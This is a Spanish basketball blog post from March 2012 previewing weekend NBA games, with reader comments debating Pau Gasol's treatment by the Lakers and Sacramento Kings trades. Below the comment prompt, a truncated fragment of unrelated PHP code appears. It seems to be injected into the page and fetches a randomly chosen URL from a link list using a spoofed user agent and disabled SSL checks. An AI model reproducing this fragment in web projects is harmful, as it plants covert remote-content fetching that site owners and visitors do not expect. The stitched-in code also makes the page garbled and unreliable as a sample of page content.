Fin de semana: Aquí os dejamos las llaves

09 de March de 2012 por txusma

¡Por fin es viernes! Día en que los habituales redactores del blog se van de fin de semana y dejan el blog en manos de unos impresentables la mar de simpáticos.No os podéis quejar que la nevera queda llena y el menú es completito, completito.

Viernes

10 partidos entre los que destaca el Lakers-Wolves. ¿Aprovechará Ricky para recuperarse teniendo en cuenta que los amarillos juegan sin base? ¿Le hará Kevin Love a Gasol cuatrillizos? ¿Kobe Bryant volverá a fallar 22 tiros? ¿Encadenarán los Lakers la 3ª derrota seguida? Preguntas que encontrarán respuesta a las 2h00.

No podemos dejar de echar un ojo a un siempre interesante Clippers-Spurs (2h30) o al Jazz – Sixers (1h00). Los Thunder ponen a prueba a Kyrie Irving y sus compañeros (2h00) y los Knicks buscan despegar ante los Bucks (2h30). En el menú también encontramos un New Jersey-Charlotte (1h00) que hará las delicias de los más masoquistas.

Sábado

El sábado juegan los cocos de la conferencia Este. Los Heat reciben a los Pacers (1h30) y los Bulls a los Jazz (2h00). En el Oeste, la lucha por las posiciones de playoffs continúa. Aparte de los Jazz juegan los Blazers (en Washington a la 1h00 ), los Wolves (reciben a los Hornets a las 2h00), los Mavs (en Oakland a las 4h30) y los Memphis y los Suns que se enfrentan en Phoenix a las 3h00.

Domingo

Y finalmente, el domingo, un plato fuerte venido a menos. Un clásico en horas bajas. Celtics – Lakers en LA a las 20h30. Antes, a las 17h00 se juega un Sixers-Knicks también muy interesante. Como siempre, los domingos podemos disfrutar de partidos a horas de gente normal.

La madrugada nos dejará más partidos entre los que destaca el Memphis – Denver (1h00), en plena lucha por las posiciones de playoffs del Oeste y el Indiana-Orlando (1h00). ¿Qué cara veremos de los Magic?

Comenta

125 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Matizo que es solo algo de beef eh? Hablando en plata, Mal Rollo, es un tema rap, y Capaz uno de los mejores rappers en español de todos los tiempos. Lo digo en el sentido de que no nos vendan milongas, si yo fuera Pau, les denunciaría a la NBA por incumplimiento de contrato. Si no querían pagarle 20 kilos a Pau, que no se los hubieran firmado. Ahora que se jodan y paguen, no te jode… Si yo soy Pau, me negaría a ir traspasado a ningún equipo, y si quieren que me amnistien, que a la hora habría 28 equipos de la NBA interesados en tener a Pau gratis mientras los Lakers le pagan 20 kilos al año sin jugar para ellos. En serio, es para joderles, si Pau tiene la opción, adelante.

      Citar

  2. Ekos dice:
    #2

    Se acabó. Ganaron los Lakers.

      Citar

  3. MagicJohnson32 dice:
    #3

    Sancho88:
    Matizo que es solo algo de beef eh? Hablando en plata, Mal Rollo, es un tema rap, y Capaz uno de los mejores rappers en español de todos los tiempos.Lo digo en el sentido de que no nos vendan milongas, si yo fuera Pau, les denunciaría a la NBA por incumplimiento de contrato. Si no querían pagarle 20 kilos a Pau, que no se los hubieran firmado. Ahora que se jodan y paguen, no te jode…Si yo soy Pau, me negaría a ir traspasado a ningún equipo, y si quieren que me amnistien, que a la hora habría 28 equipos de la NBA interesados en tener a Pau gratis mientras los Lakers le pagan 20 kilos al año sin jugar para ellos. En serio, es para joderles, si Pau tiene la opción, adelante.

    ¿Incumplimiento de contrato? Whaaaaaaaaaaaat??? ¿Y quién ha dicho que el problema de Lakers es en la pintura? ¡¡Pero si traspasaron a Pau y Odom para traerse a un base!!

    Al final victoria de los Lakers es un bonito último cuarto repleto de alternativas y en el que al final pudieron Kobe y Bynum, autores de las jugadas decisivas. Hay que elogiar a Mike Brown, porque hoy los Lakers han funcionado muy bien al final, y darle el último balón a Bynum ha resultado un gran acierto. Bien Pau de nuevo en la defensa al final, saliendo al triple de Allen y forzándole a doblarla.

    Curiosidad: Pierce y MWP han estado tan ocupados el uno con el otro que entre ambos han cogido 1 rebote en casi 70 minutos.

      Citar

  4. arvydas dice:
    #4

    Sancho, el que dice eso es el Sicario no Capaz

      Citar

  5. Jones dice:
    #5

    Anda… seguidores del rap. Esto me gusta cada día más.
    Pues eso, Kobe jugó con cabeza, y los Lakers se llevaron la victoria. Al fin me siento orgulloso de mi equipo.

      Citar

  6. Sancho88 dice:
    #6

    Cieto, arvydas

      Citar

  7. Sancho88 dice:
    #7

    MagicJohnson32: ¿Incumplimiento de contrato? Whaaaaaaaaaaaat??? ¿Y quién ha dicho que el problema de Lakers es en la pintura? ¡¡Pero si traspasaron a Pau y Odom para traerse a un base!!

    Al final victoria de los Lakers es un bonito último cuarto repleto de alternativas y en el que al final pudieron Kobe y Bynum, autores de las jugadas decisivas. Hay que elogiar a Mike Brown, porque hoy los Lakers han funcionado muy bien al final, y darle el último balón a Bynum ha resultado un gran acierto. Bien Pau de nuevo en la defensa al final, saliendo al triple de Allen y forzándole a doblarla.

    Curiosidad: Pierce y MWP han estado tan ocupados el uno con el otro que entre ambos han cogido 1 rebote en casi 70 minutos.

    No, yo lo que digo es que llevan tratando como el culo durante casi medio año al señor que les dio dos títulos, y al que ellos mismos consideran como mejor ala-pívot de su historia. Marbury se plantó (aunque no tenía razón), pero legalmente le tuvieron que pagar el pastizal que había firmado. Ahora Lakers quiere un líder más joven y que cobre menos. Yo digo, que no le hubieran firmado el contrato a Pau. Nadie les puso una pistola en la cabeza para hacerlo. Y la pregunta es, sin ser yo experto en estos temas, puede Pau plantarse y no querer irse a otro equipo y reclamar que se cumpla el contrato que firmó con Lakers? O os parece a todos que el chanchullo de intercambiar contratos es más lícito que el de exigir cumplir el contrato que has firmado con la franquicia que lo firmó? No sé, es una pregunta. Si os parece que es legal que se juegue con las emociones del jugador y se trapichée con los contratos, me parece perfecto. A mí me parece que lo que hacen muchas veces las franquicias de intercambiar cromos, derechos de jugadores, LOS DERECHOS DE ALBERT MIRALLES, etc., me parece ilegal, un atentado contra la integridad y el honor de los jugadores, que por encima de todo son personas. No creo que haya que defender tanto a las franquicias, porque Lakers la ha cagado con Pau, y es justo decirlo, y están jugando con él porque tienen el poder de ser los que le pagan, eso es innegable, pero merecen que Pau se plante y les denuncie, si tiene alguna opción de hacerlo, repito. La pregunta es, Pau tiene derecho a reclamar que se cumpla su contrato con los Lakers, o ya de por sí asumimos que es mecancía, solo un trozo de carne, solo es lo que pone en su contrato, y le tienen que intercambiar por otras personas que valgan el mismo dinero? Si es así, me callo, y entonces asumo que cuando firmas un contrato con la NBA te conviertes automáticamente en su propiedad, y pueden hacer contigo lo que quieran. Se dirá lo que se quiera del modelo deportivo europeo, pero aquí si quieren trapichear contigo y tu no quieres y te plantas, los equipos te tienen que indemnizar todo lo que pusiera en tu contrato

      Citar

  8. Sancho88 dice:
    #8

    Y yo no he dicho que el problema de Lakers sea la pintura, pero Lakers si lo piensan, porque antes de reforzar otra cosa, prefieren desarmar parte de la pintura. No sé, pensarán que Pau no está a la altura de lo que cobra…

      Citar

  9. Sancho88 dice:
    #9

    Y del partido Atlanta-Sacramento, poco que contar. Los Kings no estuvieron a la altura de un equipo como Atlanta. A Josh Smith se le veía rabioso, con ganas de hacer las cosas bien, jugando muy intenso cerca del aro. Seguramente le veamos esta semana volando hacia otra ciudad, y cualquier equipo de playoffs que consiga a esta bomba, yo creo que automáticamente sube todas sus opciones de aspirar al título. Bien Joe Johnson en su rol como tirador, con 21 puntos, pero sobre todo Smith, que fue imparable todo el partido para los aleros y ala-pívots de los Kings, y acabó con 28 puntos, 6 rebotes, 3 asistencias y 3 robos de balón, con un 13/23 en tiros de campo. Sacramento tuvo alguna posesión para haberse puesto a 2 puntos, pero vamos, más por relajación de los Hawks que por mérito propio. El partido estuvo igualado en la primera parte, pero Atlanta se marchó en el tercer cuarto y ya controló el partido hasta el final siempre con rentas cercanas a los 10 puntos. Destaca un dato por encima de todos: los 10 rebotes de Radmanovic!! La verdad que ni Jason Thompson ni Donte Greene tuvieron su noche en defensa, además sabiendo que no les van a renovar el contrato y que el equipo está planeando su primera ronda del draft con un jugador para la pintura. Si a eso le sumamos el escaso acierto de dos jugadores claves en la anotación del equipo como son Thornton y Evans (20 puntos enre los dos), vemos que el partido fue bastante sencillo para los Hawks. El 12+5 de Marvin Williams aparentemente no dice mucho, pero sí fue la clave para mantener la intensidad en la segunda unidad del equipo. DeMarcus Cousins al fin recuperó buenas sensaciones, después de una semana polémica, con alguna lesión un poco extraña, una mujer que le acusaba de mandarle fotos comprometidas, etc. Ha firmado un 28+12, jugando más que nunca (36 minutos) y convenciendo al mister en ataque y en defensa. Buena actitud en la pista, lo que a veces no es tan común debido a sus lagunas mentales, y también mayor esfuerzo en vano. Da la sensación de que va madurando, no obstante, en comparación al año pasado. Y no solo en cuanto a temas personales, sino también en cuanto a conocimiento del juego. En comparación al año pasado parece un jugador totalmente distinto. Yo no tengo ninguna duda de que a corto-medio plazo (yo diría que en 1 añito o 2) este señor será All-Star, ya juegue en Sacramento o donde sea. Es acojonantemente bueno

      Citar

  10. Sancho88 dice:
    #10

    Y lo comento por si a alguien le interesa. John Salmons también está subiendo muchísimo el rendimiento, pero en este caso asumiendo otro rol. Sale desde el banquillo desde la posición de base, y ha mejorado mucho sus porcentajes de acierto, su defensa y sus asistencias. El nuevo rol que se ha inventado Smart para él parece que le viene muy bien, y de verdad que está jugando muy muy bien con respecto a la primera parte de la temporada, lo cual tampoco era muy difícil, todo sea dicho. Pero junto a García y también Hayes, están dando mucha experiencia al equipo y están siendo muy profesionales, sobre todo en defensa. Los Kings ya no son esa banda chirigotera del año pasado, en parte gracias a la salida del equipo de Paul Westphal y al compromiso de los veteranos, que están inculcando al resto lo que han aprendido de la competición en todos sus años de carrera. También sorprende la mejora de Jimmer Freddette en estas últimas semanas. Se le ve mucho más concentrado, mucho más intenso en defensa y asumiendo que tiene que dar un paso adelante en la anotación. Se le ve más confiado y más valiente a la hora de tirar, y realmente tiene una mano maravillosa. No sé, los Kings con algunos retoques pueden ser un equipo interesante para el año que viene

      Citar

  11. Sancho88 dice:
    #11

    JAJAJ, estoy leyendo que muchos aficionados de los Kings piden un trade Tyreke x Smith. Ni de coña creo que quiera venirse a jugar a un equipo como los Kings, ni que los Hawks aceptasen una cosa así…

      Citar

  12. melo15 dice:
    #12

    Sancho, los Kings se han de decidir, o Evans o Thorton, son bastante incompatibles, y yo escojo a Evans y vendo a Thorton por un alero o una 1 ronda del draft

      Citar

  13. Denise dice:
    #13

    Tio, Sancho, la NBA siempre ha sido así, y es el modelo que a mi me gusta, que el equipo prime sobre el jugador, o si no, la NBA se convertirá como el futbol, donde unos caprichosos jugadores, los mejores casi siempre, tienen poder para decidir sobre su futuro y se niegan a ir a determinados clubes para acabar en los mismos de siempre (Barça, Madrid, United, City, Chelsea, Milan, etc…) convirtiendo el futbol en algo aburrido donde siempre ganan los mismos y abusando de los demas.
    Si le damos tanto poder a los jugadores, la NBA perderá su interés y su igualdad competitiva y se convertirá en coto cerrado y anillo solo para las grandes ciudades, mercados y equipos historicos.

    Y considerando injusto lo de Pau, tio…con el momento que estamos pasando, ya me gustaría a mi estar en la situación de Pau, estando puteado por tus superiores pero cobrando 20 kilos al año. Si nos ponemos así,…tendriamos que tener pena por todos los jugadores traspasados, pobrecito Kwame Brown cuando lo mandaron a aquellos Grizzlies, pobrecito Josh Howard que era el escudero de Dirk en los Mavs y lo mandaron a una mierda de equipo como los Wizards, y ejemplos así miles. No es Pau el primero ni será el ultimo en estar en esa situación, en la cual cualquier persona se cambiaría por estar pasando los “malos momentos” que los Lakers le están haciendo pasar.

      Citar

  14. Sancho88 dice:
    #14

    melo15:
    Sancho, los Kings se han de decidir, o Evans o Thorton, son bastante incompatibles, y yo escojo a Evans y vendo a Thorton por un alero o una 1 ronda del draft

    Yo, fíjate, propondría un trade Conley-Mayo x Evans-Thornton. No sé si cuadran los salarios, pero creo que ambos equipos saldrían ganando

      Citar

  15. Sancho88 dice:
    #15

    Evans-Thornton-Gay-Randolph-Marc no suena nada mal no? Y los Kings tendrían que elegir un ala-pívot en el draft y seguir buscando un alero. Las posiciones que tienen cojas ahora mismo son esas, y la pareja Conley-Thomas, sería una pareja de bases buenísima, y Mayo tendría toda la libertad para jugar toda la minutada que quisiera, sin esa presión que ha tenido Tyreke de ser el jugador franquicia, que le ha venido fatal. A Tyreke le viene mejor que la presión la tengan otros para poder jugar su juego. Mayo está acostumbrado a vivir sin presión, y eso no cambiaría en Sacramento, porque el jugador franquicia es Cousins. Y además Evans ya estudió en Memphis, así que encajaría a la perfección, no creeis?

      Citar

  16. Denise dice:
    #16

    Sancho88: O os parece a todos que el chanchullo de intercambiar contratos es más lícito que el de exigir cumplir el contrato que has firmado con la franquicia que lo firmó? No sé, es una pregunta. Si os parece que es legal que se juegue con las emociones del jugador y se trapichée con los contratos, me parece perfecto.

    y entonces asumo que cuando firmas un contrato con la NBA te conviertes automáticamente en su propiedad, y pueden hacer contigo lo que quieran. Se dirá lo que se quiera del modelo deportivo europeo, pero aquí si quieren trapichear contigo y tu no quieres y te plantas, los equipos te tienen que indemnizar todo lo que pusiera en tu contrato

    El “chanchullo” es maginifico, da igualdad a la competición y la posibilidad de que todos los equipos tengan sus ciclos ganadores y perdedores.

    Un modelo deportivo europeo, implicaría que, por ejemplo, tus Kings no tuvieran nunca la posibilidad de tener estrellas, y si estuviera implantado, ahora mismo Tireke Evans y Cousins ya no estarían jugando en los Kings, te lo hubieran comprado los “grandes” por dos duros y lo tienes que malvender porque el caprichoso jugador pide irse a otro club mas podderoso.

      Citar

  17. Sancho88 dice:
    #17

    Evans: 17-5-5
    Conley: 13-2-7-2,5

    Thornton: 18-3-2
    OJ Mayo: 12-3-2, (pero jugando casi 10 minutos menos que Thornton)

      Citar

  18. Sancho88 dice:
    #18

    Ya, Denise, lo de la posibilidad de que haya igualdad en la liga y demás siempre se dice, pero al final los buenos siempre acaban jugando en los equipos grandes, salvo lo de los Thunder, que ha sido a golpe de draft…

      Citar

  19. Nacho dice:
    #19

    Partidazo en el Staples anoche. Serán equipos de viejos, pero qué gozada. Por fin Brown hizo algo interesante, aunque creo que reparte mal los minutos de descanso, sobre todo de Pau y Bynum, y más los del nuyestro. No digo la cantidad de minutos, si no los tiempos. Pero vamos, me quedo con el tiempo muerto pedido a falta de 20tantos segundos con la bola en la mano de Kobe. Y quien decidiera la última posesión estuvo lúcido. Igual el bueno de Mike miró al otro banquillo y dijo “este es bueno, ¿este qué haría?” y se le ocurrió la jugada, ¡o fue a Messina? jeje.
    Por lo demás un partido serio de los titulares de Lakers. Y otra vez los números no hacen justicia al partidazo de Pau.

    La otra noche vi el Suns Memphis. Los ositos estuvieron vulgares. Creo que la planificación de los partidos empieza a ser importante. Memphis tiene un back to back, primera parada Phoenix, segunda Denver. ¿Cuál hay que ganar? el de Colorado. Así contra los Suns juegan en modo automático, si ganamos bien, pero fuerzas las justas. Esa es la impresión que me dio viendo el partido. Y les salió bastante bien, porque anoche ganaron a los Nuggets. Sigo creyendo que serán los terceros (o segundos) del Oeste.

    Clippers sigue su particular descenso, ¿empiezan a sonar las alarmas?

    Millwake ya le come la oreja a los Knicks, y esta noche puede iniciar el sorpaso, juega en New Jersey, que con Deron es plaza fácil, y sin él es un chollo, y los de la gran manzana van a Chicago.

    Carmelo Anthoy, o como pinchar el sueño Lin. Creo que es el último documental de Spike Lee.

      Citar

  20. Nacho dice:
    #20

    ¡Ah! Creo que desde anoche se empiezan a pitar los paso flagrantes al entrar a canasta. Sobre todo si eres blanco y no parece que tu mate aporte espectáculo.

      Citar

  21. Sancho88 dice:
    #21

    Si Messina tiene que coger las riendas y dibujar un ataque, pasaría esto:

      Citar

  22. Denise dice:
    #22

    Sancho88: Ya, Denise, lo de la posibilidad de que haya igualdad en la liga y demás siempre se dice, pero al final los buenos siempre acaban jugando en los equipos grandes, salvo lo de los Thunder, que ha sido a golpe de draft…

    Pero acaban jugando cuando son agentes libres, no con contrato en vigor. Mientras tienen contrato, los equipos pequeños se pueden permitir el lujo de tener un megacrack en su equipo.
    Si le damos poder a los jugadores, mañana tendríamos a Durant y a Westbrook pidiendo el traspaso, y los Thunder obligados a mal-venderlos porque sus estrellas ya no quieren jugar allí. Los Wolves mas de lo mismo, no podrían montar el equipazo que se van a formar en torno a Kevin Love.
    Y gente sin demostrar nada pero con futuro como Irving, Kemba y John Wall tambien habrían pedido el traspaso.
    Y al final equipos como Cleveland, Charlotte, Milwaukee, Oklahoma, Toronto o Minessota se verian obligados eternamente a jugar con un equipo basura

      Citar

  23. Sancho88 dice:
    #23

    Mira, en eso te doy la razón, no me había parado a pensarlo, pero aún así debe ser un calvario para Pau. Desde que empezó la liga hay rumores casi todas las semanas. Y aún así, el tipo logra concentrarse en su trabajo. Realmente es una tortura todo lo que está pasando, y aunque cobra mucho dinero, creo que ahora mismo firmaría cobrar la mitad pero que le dejaran en paz hacer su trabajo. Y si no fuera así, es que realmente no conocemos a Pau, pero yo diría que es un tipo muy humano, y casi todo el mundo que ha hablado de él lo corrobora.

    Por cierto, estoy muy desesperado con un asunto. Es sencillo. Aquí hablamos el otro día de rap, bien, comisión de sabios. Necesito urgentemente saber qué canción suena de fondo en el Generación NBA+ de esta semana a partir del minuto 10:40, en el reportaje de Kyrie Irving.

    http://www.youtube.com/watch?v=qwfbrIFboJU&feature=g-all-u&context=G2fb066bFAAAAAAAAEAA

    Iba a abrir un hoygan, gracias de antebraso en el yahoo respuestas, pero creo que ustedes son mucho más sabios que el comité de sabios del club de los hoygan, que suelen rayar a buen nivel, todo sea dicho.

    Y ya de paso, y sin tener ningún interés, suscribiros al canal de este tío que cuelga todas las semanas el generación nba+, que está bastante entretenido

      Citar

  24. Denise dice:
    #24

    Pero las reglas de la NBA en ese asunto no son nuevas, Gasol no es el primero en estar en esa situación, cualquier jugador debe tener asumido desde que es un rookie que en cualquier momento lo pueden llevar a otro lado. Yo creo que hay que quitarle hierro al asunto, tampoco lo van a llevar a un campo de concentración, si lo mandan a otro sitio, pues será igual de rico, estará bien tratado sea la franquicia que le acoja, vivirá en una mansión y tendrá mas posibilidades de anillo que en los futuros Lakers.
    Depende de como se tome la vida cada uno, ojala estuviese yo en la situacion de Pau.

    PD: En el rap no te puedo ayudar.

      Citar

  25. Rompe dice:
    #25

    El tema de los traspasos en la NBA es así y todos lo saben antes de ir allí, no es nuevo. Y si dices que Pau está viviendo un calvario, qué no estará pasando Howard, por ejemplo, que es la pieza principal sobre la que giran la mayoría de traspasos… Al final son jugadores profesionales que cobran por jugar donde se les diga, y no creo que esté mal pagado como para pedir que tengan más derechos. Si quieren pueden ir a Europa a jugar por dos duros (comparativamente)…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>